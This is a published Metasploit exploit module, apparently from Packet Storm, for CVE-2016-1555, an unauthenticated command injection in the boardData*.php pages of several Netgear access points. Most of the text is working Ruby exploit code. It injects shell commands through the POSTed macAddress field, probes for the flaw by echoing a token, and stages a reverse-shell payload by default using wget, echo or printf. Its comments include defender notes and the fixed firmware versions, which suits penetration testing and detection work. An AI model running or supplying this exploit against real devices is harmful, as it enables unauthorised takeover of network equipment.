
Netgear Unauthenticated Remote Command Execution

2018-11-27 00:00:00
Imran Dawoodjee
packetstormsecurity.com
100

EPSS

0.974

Percentile

99.9%

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote
  # Unauthenticated command injection (CVE-2016-1555) in the boardData*.php
  # pages of the Netgear access points named in the description below. The
  # device splices the POSTed `macAddress` value into a shell command, so the
  # module sends "<MAC>;<command>;" (built in #execute_command); 'Privileged'
  # is declared true for the resulting session. Defender's notes: the request
  # shape built there -- a POST to the TARGETURI page whose macAddress field
  # carries ';' -- is the thing to alert on, and the fixed firmware versions
  # are the ones quoted from the CVE entry in the description.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Registers the module metadata and its two options.
  #
  # NOTE(review): the MAC_ADDRESS default is evaluated once, when this file is
  # loaded, so the same random value is reused until the module is reloaded.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Netgear Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
(3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
arbitrary commands.
},
      'Author' => [
        'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
        'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2016-1555'],
        ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
        ['PACKETSTORM', '135956'],
        ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
      ],
      'DisclosureDate' => 'Feb 25 2016', # per the seclists full-disclosure post referenced above
      'Privileged' => true,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'Payload' => {},
      'DefaultOptions' => {
        'CMDSTAGER::FLAVOR' => 'wget',
        'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
        'WfsDelay' => 10
      },
      'Targets' => [['Automatic', {}]],
      'CmdStagerFlavor' => %w[echo printf wget],
      'DefaultTarget' => 0
    ))
    register_options([
      OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']),
      OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
    ])
  end

  # Probes for the injection without staging anything: echoes a random token
  # through #execute_command and reports Vulnerable only when that token comes
  # back inside an <input> element of a 200 response. Unknown means no
  # response at all; Safe covers every other outcome.
  def check
    token = Rex::Text.rand_text_alpha(12)
    res = execute_command("echo #{token}")

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end
    return CheckCode::Safe if res.code != 200

    echoed = res.get_html_document.at('input').to_s
    echoed.include?(token) ? CheckCode::Vulnerable : CheckCode::Safe
  end

  # Sends one POST to TARGETURI with the command spliced into the macAddress
  # field as "<MAC>;<cmd>;". This is also the CmdStager callback, which is why
  # it accepts (and ignores) opts. Returns the raw response, or nil when the
  # request got no answer; a connection-level error aborts the module.
  def execute_command(cmd, opts = {})
    injected = "#{datastore['MAC_ADDRESS']};#{cmd};"
    begin
      send_request_cgi(
        'method' => 'POST',
        'headers' => { 'Connection' => 'Keep-Alive' },
        'uri' => normalize_uri(target_uri.path),
        'vars_post' => {
          'macAddress' => injected,
          'reginfo' => '1',
          'writeData' => 'Submit'
        }
      )
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
    end
  end

  # Refuses to fire unless #check reports Vulnerable, then hands off to the
  # CmdStager, which delivers the payload through #execute_command in command
  # lines of at most 2048 bytes.
  def exploit
    fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!') unless check == CheckCode::Vulnerable

    execute_cmdstager(linemax: 2048) # the original comment notes 130,000 as the maximum
  end
end
  
`